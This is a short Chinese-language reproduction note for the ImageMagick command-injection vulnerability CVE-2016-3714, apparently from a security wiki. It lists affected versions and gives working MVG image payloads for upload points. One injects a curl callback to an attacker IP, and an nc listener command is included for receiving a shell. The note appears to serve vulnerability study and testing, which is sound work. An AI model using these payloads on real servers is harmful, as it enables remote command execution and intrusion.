menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2016-3714)ImageMagick 命令执行漏洞 chevron_right (CVE-2016-3714)ImageMagick 命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2016-3714)ImageMagick 命令执行漏洞.md
    834 B / 2021-07-15 19:53:52
        (CVE-2016-3714)ImageMagick 命令执行漏洞
    =========================================
    
    一、漏洞简介
    ------------
    
    /etc/ImageMagick/delegates.xml 将%s,%l加入到command里造成了命令执行
    
    二、漏洞影响
    ------------
    
    ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
    
    ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
    
    低版本至6.9.3-9 released 2016-04-30
    
    三、复现过程
    ------------
    
    ### poc
    
        push graphic-context
        viewbox 0 0 640 480
        fill 'url(https://"| command")'
        pop graphic-context
    
    图片上传点,抓包,附上exp代码:
    
        push graphic-context
        viewbox 0 0 640 480
        fill 'url(https://"| curl 172.16.20.108:8888")'
        pop graphic-context
    
    > ip:你要反弹的shell地址,2333端口号,服务器监听反弹shell。
    
        nc -lvp ``8888
    
    image
    
    
    links
    file_download